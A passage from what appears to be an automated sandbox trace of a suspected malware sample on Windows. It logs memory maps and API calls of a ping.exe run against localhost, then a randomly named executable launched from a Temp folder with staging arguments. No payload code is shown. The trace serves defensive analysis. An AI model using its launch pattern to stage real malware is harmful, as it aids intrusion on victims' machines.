= 905 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 906 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 907 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name 
= "private_0x000000007ffdd000" filename = "" Region: id = 908 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 910 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 911 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 912 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 913 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 914 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 915 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 916 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 917 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 918 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 919 start_va = 0x75810000 end_va = 0x75815fff entry_point = 
0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 920 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 921 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 922 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 923 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 924 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 925 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 926 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 927 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 928 start_va = 0x773e0000 end_va = 
0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 929 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 930 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 931 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 932 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 933 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 934 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 935 start_va = 0xe0000 end_va = 0xe2fff entry_point = 0xe0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 936 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 937 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 938 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 939 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 940 start_va = 0x11d0000 end_va = 0x149efff entry_point = 0x11d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 941 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 942 start_va = 0x300000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 943 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1008 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1036 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1037 start_va = 0x130000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1078 start_va = 0x15d0000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 1079 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1080 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = 
"\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1091 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1101 start_va = 0x14a0000 end_va = 0x157ffff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 1203 start_va = 0x1710000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 1204 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1291 start_va = 0x1670000 end_va = 0x16affff entry_point = 0x0 region_type = private name = "private_0x0000000001670000" filename = "" Region: id = 1292 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 14 os_tid = 0xb40 [0095.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fc5c | out: lpSystemTimeAsFileTime=0x22fc5c*(dwLowDateTime=0x7767d860, dwHighDateTime=0x1d440a9)) [0095.807] GetCurrentProcessId () returned 0xb3c [0095.807] GetCurrentThreadId () returned 0xb40 [0095.807] GetTickCount () returned 0x22fc6 [0095.807] QueryPerformanceCounter (in: lpPerformanceCount=0x22fc54 | out: lpPerformanceCount=0x22fc54*=15259657363) returned 1 [0095.808] GetModuleHandleA (lpModuleName=0x0) returned 0x1c0000 [0095.808] __set_app_type (_Type=0x1) [0095.808] __p__fmode () returned 0x76b331f4 [0095.808] __p__commode () returned 0x76b331fc [0095.808] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1c2ae1) returned 0x0 [0095.808] __getmainargs (in: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8, _DoWildCard=0, _StartInfo=0x1c50e8 | out: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8) returned 0 
[0095.809] SetThreadUILanguage (LangId=0x0) returned 0x409 [0095.809] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0095.809] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1c5440 | out: lpWSAData=0x1c5440) returned 0 [0095.816] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x22f6ec | out: phkResult=0x22f6ec*=0x58) returned 0x0 [0095.816] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x22f6e0, lpData=0x22f6e8, lpcbData=0x22f6e4*=0x4 | out: lpType=0x22f6e0*=0x0, lpData=0x22f6e8*=0x0, lpcbData=0x22f6e4*=0x4) returned 0x2 [0095.816] RegCloseKey (hKey=0x58) returned 0x0 [0095.816] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f6b4*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f6dc | out: ppResult=0x22f6dc*=0x0) returned 11001 [0095.816] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f6b4*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f6dc | out: ppResult=0x22f6dc*=0x3e46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x3e47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3e47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3e3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0096.764] FreeAddrInfoW (pAddrInfo=0x3e46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x3e47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, 
sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3e47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3e3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0096.764] Icmp6CreateFile () returned 0x3e8b40 [0097.340] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x3e4830 [0097.340] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x3eebb0 [0097.341] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fbdc, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0097.341] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x22f6dc, nSize=0x0, Arguments=0x22f6d8 | out: lpBuffer="XH>") returned 0x19 [0097.341] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x3e4858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0097.341] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.341] _write (in: _FileHandle=1, _Buf=0x3e4858*, _MaxCharCount=0x19 | out: _Buf=0x3e4858*) returned 25 [0097.350] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.350] LocalFree (hMem=0x3e4858) returned 0x0 [0097.350] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x22f6e0, nSize=0x0, Arguments=0x22f6dc | out: lpBuffer="XH>") returned 0x18 [0097.350] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x3e4858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0097.350] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.350] _write (in: _FileHandle=1, _Buf=0x3e4858*, _MaxCharCount=0x18 | out: _Buf=0x3e4858*) returned 24 [0097.353] _setmode (_FileHandle=1, _Mode=16384) returned 
32768 [0097.353] LocalFree (hMem=0x3e4858) returned 0x0 [0097.353] SetConsoleCtrlHandler (HandlerRoutine=0x1c17ca, Add=1) returned 1 [0097.353] Icmp6SendEcho2 (in: IcmpHandle=0x3e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f758, DestinationAddress=0x1c55e0, RequestData=0x3e4830, RequestSize=0x20, RequestOptions=0x22f708, ReplyBuffer=0x3eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x3eebb0) returned 0x1 [0097.408] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fbdc, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0097.408] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f6e0, nSize=0x0, Arguments=0x22f6dc | out: lpBuffer=" Q>") returned 0x10 [0097.408] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x3e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0097.408] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.409] _write (in: _FileHandle=1, _Buf=0x3e5120*, _MaxCharCount=0x10 | out: _Buf=0x3e5120*) returned 16 [0097.409] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.409] LocalFree (hMem=0x3e5120) returned 0x0 [0097.409] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer="\x10<>") returned 0x9 [0097.409] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x3e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0097.409] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.409] _write (in: _FileHandle=1, _Buf=0x3e3c10*, _MaxCharCount=0x9 | out: _Buf=0x3e3c10*) returned 9 [0097.409] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.409] LocalFree (hMem=0x3e3c10) returned 0x0 
[0097.409] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer=" \x8f>") returned 0x2 [0097.409] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x3e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0097.409] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0097.409] _write (in: _FileHandle=1, _Buf=0x3e8f20*, _MaxCharCount=0x2 | out: _Buf=0x3e8f20*) returned 2 [0097.410] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0097.410] LocalFree (hMem=0x3e8f20) returned 0x0 [0097.410] Sleep (dwMilliseconds=0x3e8) [0098.415] Icmp6SendEcho2 (in: IcmpHandle=0x3e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f758, DestinationAddress=0x1c55e0, RequestData=0x3e4830, RequestSize=0x20, RequestOptions=0x22f708, ReplyBuffer=0x3eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x3eebb0) returned 0x1 [0098.675] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fbdc, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0098.675] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f6e0, nSize=0x0, Arguments=0x22f6dc | out: lpBuffer=" Q>") returned 0x10 [0098.675] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x3e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0098.675] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0098.675] _write (in: _FileHandle=1, _Buf=0x3e5120*, _MaxCharCount=0x10 | out: _Buf=0x3e5120*) returned 16 [0098.675] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0098.675] LocalFree (hMem=0x3e5120) returned 0x0 [0098.675] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, 
lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer="\x10<>") returned 0x9 [0098.675] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x3e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0098.675] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0098.675] _write (in: _FileHandle=1, _Buf=0x3e3c10*, _MaxCharCount=0x9 | out: _Buf=0x3e3c10*) returned 9 [0098.676] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0098.676] LocalFree (hMem=0x3e3c10) returned 0x0 [0098.676] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer=" \x8f>") returned 0x2 [0098.676] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x3e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0098.676] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0098.676] _write (in: _FileHandle=1, _Buf=0x3e8f20*, _MaxCharCount=0x2 | out: _Buf=0x3e8f20*) returned 2 [0098.676] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0098.676] LocalFree (hMem=0x3e8f20) returned 0x0 [0098.676] Sleep (dwMilliseconds=0x3e8) [0099.854] Icmp6SendEcho2 (in: IcmpHandle=0x3e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f758, DestinationAddress=0x1c55e0, RequestData=0x3e4830, RequestSize=0x20, RequestOptions=0x22f708, ReplyBuffer=0x3eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x3eebb0) returned 0x1 [0100.097] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22fbdc, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.098] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f6e0, nSize=0x0, Arguments=0x22f6dc | out: lpBuffer=" Q>") returned 0x10 [0100.098] CharToOemBuffA (in: 
lpszSrc="Reply from ::1: ", lpszDst=0x3e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0100.098] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.098] _write (in: _FileHandle=1, _Buf=0x3e5120*, _MaxCharCount=0x10 | out: _Buf=0x3e5120*) returned 16 [0100.098] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.098] LocalFree (hMem=0x3e5120) returned 0x0 [0100.098] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer="\x10<>") returned 0x9 [0100.098] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x3e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0100.098] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.098] _write (in: _FileHandle=1, _Buf=0x3e3c10*, _MaxCharCount=0x9 | out: _Buf=0x3e3c10*) returned 9 [0100.098] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.098] LocalFree (hMem=0x3e3c10) returned 0x0 [0100.098] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f6e4, nSize=0x0, Arguments=0x22f6e0 | out: lpBuffer=" \x8f>") returned 0x2 [0100.098] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x3e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0100.099] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.099] _write (in: _FileHandle=1, _Buf=0x3e8f20*, _MaxCharCount=0x2 | out: _Buf=0x3e8f20*) returned 2 [0100.099] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.099] LocalFree (hMem=0x3e8f20) returned 0x0 [0100.099] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f6a8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.099] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, 
dwLanguageId=0x0, lpBuffer=0x22f678, nSize=0x0, Arguments=0x22f674 | out: lpBuffer="\xd0\x0c\x3f") returned 0x56 [0100.099] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x3f0cd0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0100.099] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.099] _write (in: _FileHandle=1, _Buf=0x3f0cd0*, _MaxCharCount=0x56 | out: _Buf=0x3f0cd0*) returned 86 [0100.100] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.100] LocalFree (hMem=0x3f0cd0) returned 0x0 [0100.100] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x22f688, nSize=0x0, Arguments=0x22f684 | out: lpBuffer="\xe8\x0c\x3f") returned 0x61 [0100.100] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x3f0ce8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0100.100] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.100] _write (in: _FileHandle=1, _Buf=0x3f0ce8*, _MaxCharCount=0x61 | out: _Buf=0x3f0ce8*) returned 97 [0100.100] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.100] LocalFree (hMem=0x3f0ce8) returned 0x0 [0100.100] IcmpCloseHandle (IcmpHandle=0x3e8b40) returned 1 [0100.242] LocalFree (hMem=0x3e4830) returned 0x0 [0100.242] LocalFree (hMem=0x3eebb0) returned 0x0 [0100.242] WSACleanup () returned 0 [0100.469] exit (_Code=0) Thread: id = 19 os_tid = 0xb70 Thread: id = 22 os_tid = 0xb90 Thread: id = 23 os_tid = 0xb9c Process: id = "14" image_name = "nhsgkr2p.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe" page_root = "0x7ea16800" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = 
"0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xad4" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 868 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 869 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 870 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 871 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "nhsgkr2p.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe") Region: id = 872 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 873 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 874 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed 
